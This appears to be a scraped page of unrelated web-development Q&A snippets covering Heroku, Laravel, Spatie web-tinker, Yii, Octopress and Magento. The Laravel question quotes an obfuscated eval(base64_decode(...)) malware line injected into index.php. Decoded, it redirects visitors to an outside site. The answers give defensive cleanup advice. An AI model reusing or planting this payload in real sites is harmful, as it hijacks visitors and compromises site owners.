I understand that Heroku removes the .git directory as part of reducing the size of its slug
Is there a way to disable that?
Related
All my Laravel websites have been infected by a malicious code named aeR4Choc.
It seems to (only???) infect the public/index.php file by redirecting to malicious sites.
here's the line that can be decoded:
/*aeR4Choc_start*/#eval(base64_decode('aWYoIWRlZmluZWQoImNoYWVKb3U3IikpewogICAgZGVmaW5lKCJjaGFlSm91NyIsIDEpOwogICAgZnVuY3Rpb24gaXNNb2JpbGUoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdhbmRyb2lkJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnYmxhY2tiZXJyeScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwaG9uZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwYWQnKSAhPT0gZmFsc2UKICAgICAgICAgICAgfHwgc3RycG9zKCR1YWdlbnRTdHIsICdpcG9kJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnb3BlcmEgbWluaScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2llTW9iaWxlJykgIT09IGZhbHNlKXsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CiAgICAgICAgfQogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH0KCiAgICBmdW5jdGlvbiBpc0Rlc2t0b3AoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdlZGdlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnbXNpZScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ29wcicpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9taXVtJykgIT09IGZhbHNlCiAgICAgICAgICAgIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnZmlyZWZveCcpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9tZScpICE9PSBmYWxzZSl7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwogICAgICAgIH0KICAgICAgICByZXR1cm4gZmFsc2U7CiAgICB9CgogICAgJHJlZGlyVG8gPSAiaHR0cHM6Ly93d3cucm94b2Vub3MueHl6LyI7CiAgICAkY2hlY2tDb29rUmVkaXJTdHIgPSAiYWVOZWU4cGkiOwogICAgJHJlZGlyZWN0QWxsb3cgPSB0cnVlOwogICAgZm9yZWFjaCAoJF9DT09LSUUgYXMgJGNvb2tLZXk9PiRjb29rVmFsKXsKICAgICAgICBpZiAoc3RycG9zKCRjb29rS2V5LCAnd29yZHByZXNzX2xvZ2dlZF9pbicpICE9PSBmYWxzZSB8fCAkY29va0tleSA9PSAkY2hlY2tDb29rUmVkaXJTdHIpIHsKICAgICAgICAgICAgJHJlZGlyZWN0QWxsb3cgPSBmYWxzZTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgfQoKICAgICR1YWdlbnQgPSBzdHJ0b2xvd2VyKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7CgogICAgaWYgKCRyZWRpcmVjdEFsbG93KXsKICAgICAgICBpZihpc01vYmlsZSgkdWFnZW50KSB8fCBpc0Rlc2t0b3AoJHVhZ2VudCkpIHsKICAgICAgICAgICAgc2V0Y29va2llKCRjaGVja0Nvb2tSZWRpclN0ciwgIjEiLCB0aW1lKCkgKyA2MDQ4MDApOwogICAgICAgICAgICBoZWFkZXIoIkxvY2F0aW9uOiAkcmVkaXJUbyIpOwogICAgICAgICAgICBkaWU7CiAgICAgICAgfQogICAgfQp9'));/*aeR4Choc_end*/
My questions:
How to get rid of it ? Just by deleting it?
How did it happened and how can I prevent further attacks?
Thanks!
I would start by restoring the original index.php file from the Laravel install. You can just delete the code, but they may have added more (like a cors header). Might want to load up a backup from before the hack and run a diff to see what other files were altered.
Check the file permissions on index.php - change it to 644 and change the owner to root and group to www (if you have that group).
If you have debug=true in your .env file you may be open to attack
https://www.ambionics.io/blog/laravel-debug-rce
I love this little library - so helpful.
However, it places some of its css and js files in a vendor folder inside the public directory of Laravel. I've got a Vendor class and paths in several apps and so, when saving a new Vendor, it redirects 403 Forbidden due to the conflicted vendor folder in the public directory.
I can't go back and refactor just for this to work, much as I like it.
It comes with a publishable config file, but I don't see an option to change the path to these files to a location outside the vendor folder. I don't want to make changes to the Spatie files, as this would just be overwritten upon next update.
Am I missing something easy here? Any way to get around this?
There isn't currently a config setting that allows you to control this.
The line causing you grief is here - https://github.com/spatie/laravel-web-tinker/blob/master/src/WebTinkerServiceProvider.php#L29. It publishes the compiled assets, as you say, into the public/vendor folder.
If you do not want to refactor your existing work, you can:
PR/fork a change to add this as a config setting
Manually change it on your end (although this could easily break if you republsihed the assets ever
Now exist problem, because I modify css or js files users must clearing clear their browser cache to get newest changes. How to prevent this ? I think, that best way is define assets timestamp, Yii have something special for this ?
I not understand for what is it. After deploy new version static to server you can clear assets folder. After this will be created new assets from last version files.
I am converting my blog to octopress/jekyll hosted on Heroku.
It all works well locally however when loaded up to Heroku I get capitalised URL's that seem to persist across updates and rebuilds of the remote repository.
The posts at locations like mydomain/category/postname contain html redirection files to help with the change in url structure between the previous wordpress domain/category/postname to the default octopress style domain/yyyy/mm/dd/postname. These are created using the Alias Generator plugin from tsmango
If I type http://www.williampickup.org/Ceramics/john-dermer into a browser the redirect works, while the lowercase version doesn't. The uppper case directory names for categories were an artefact of the original script I used to create the Alias yaml entries in my blog posts. I have fixed that locally however I can't seem to upload the correct lowercase directory structure to Heroku.
Eventually I noticed that the directory names were being capitalised when I committed the changes to my git repository.
The solution turned out to be to change the git config setting so that ignorecase = true.
I am working on Magento and trying to make some changes on one of the .phtml files. But my changes never reflect on the web site. I have tried the following things:
Clear Magento cache and delete cache storage
Open the path hint and make sure I am editing the correct file
Go to magento admin panel, System->Configuration->Design, and make sure templates, skin, layout and default folders are correct.
None of the above action worked. Is there anything else that I could do?
Thanks a lot.
Screen shot
First thing you would want to check is the cache. System > Cache Management. Disable the Layout and Blocks HTML output caches and refresh the frontend page where you've put your changes.
If cache isn't the problem there is a way to find out which template is rendered in a specific location because you may not be editing the correct file.
Go to System > Configuration, select your website from top left Current Configuration Scope, then go to Developer > Debug and set Template Path Hints to Yes.
After this, save your config and refresh the page where you want to modify the .phtml.
If you are working on a live environment make sure not everybody will be able to see the template paths by putting your IP in the Allowed IPs input from Developer Client Restrictions.
After you are finished with this re-enable the cache.